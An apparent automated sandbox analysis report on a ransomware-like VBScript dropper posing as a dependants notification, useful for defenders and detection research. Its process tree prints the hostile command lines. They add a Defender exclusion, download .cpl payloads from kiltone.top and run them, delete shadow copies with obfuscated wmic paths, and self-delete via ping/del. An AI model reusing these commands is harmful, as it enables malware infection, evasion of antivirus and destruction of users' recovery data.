Windows
Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs
Overview
General Information
Detection
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses insecure TLS / SSL version for HTTPS connection
Classification
- System is w10x64
- wscript.exe (PID: 6760 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 6896 cmdline: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9)
  - chrome.exe (PID: 7092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  - chrome.exe (PID: 2856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2012,i,1751520470238867524,1103501231099164718,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  - cmd.exe (PID: 7152 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 6356 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 7752 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7856 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 7008 cmdline: "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - control.exe (PID: 7608 cmdline: control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)
  - rundll32.exe (PID: 4716 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: EF3179D498793BF4234F708D3BE28633)
  - rundll32.exe (PID: 8084 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 889B99C52A60DD49227C5E485A016679)
  - cmd.exe (PID: 7520 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 5592 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - cmd.exe (PID: 7032 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7216 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - cmd.exe (PID: 7776 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 1876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - eryy65ty.exe (PID: 8180 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 9049FABA5517305C44BD5F28398FB6B9)
  - WMIC.exe (PID: 6952 cmdline: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 7868 cmdline: c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 1192 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - PING.EXE (PID: 7800 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
  - WMIC.exe (PID: 7120 cmdline: c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 6420 cmdline: c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 6388 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - PING.EXE (PID: 4132 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
  - WMIC.exe (PID: 6200 cmdline: c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 4444 cmdline: c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 5612 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - PING.EXE (PID: 6000 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 6236 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
⊘No configs have been found
⊘No yara matches
Operating System Destruction

| Source | Author |
|---|---|
| | Joe Security |

System Summary

| Source | Author |
|---|---|
| | Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) |
| | Jonathan Cheong, oscd.community |
| | Jonathan Cheong, oscd.community |
| | Jonathan Cheong, oscd.community |
| | Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing |
| | Florian Roth (Nextron Systems) |
| | Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) |
| | Ilya Krestinichev |
| | Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
| | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| | Christian Burkard (Nextron Systems) |
| | Florian Roth (Nextron Systems) |
| | Florian Roth (Nextron Systems) |
| | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| | James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger |
| | Michael Haag |
| | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
| | vburov |
⊘No Suricata rule has matched
AV Detection

| Source | Evidence | Entries |
|---|---|---|
| | Avira URL Cloud | 2 |
| | Virustotal | 1 |
| | ReversingLabs | 2 |
| | Virustotal | 1 |
| | Integrated Neural Analysis Model | 1 |
| | Joe Sandbox ML | 1 |
| | HTTP Parser | 3 |
| | HTTPS traffic detected | 8 |
| | Binary string | 3 |
| | File opened | 6 |
Software Vulnerabilities

| Source | Evidence | Entries |
|---|---|---|
| | Child | 1 |
| | Memory has grown | 1 |
Networking

| Source | Evidence | Entries |
|---|---|---|
| | Process created | 1 |
| | IP Address | 1 |
| | ASN Name | 1 |
| | JA3 fingerprint | 2 |
| | HTTPS traffic detected | 1 |
| | TCP traffic detected without corresponding DNS query | 50 |
| | HTTP traffic detected | 5 |
| | String found in binary or memory | 2 |
| | DNS traffic detected | 3 |
| | HTTP traffic detected | 1 |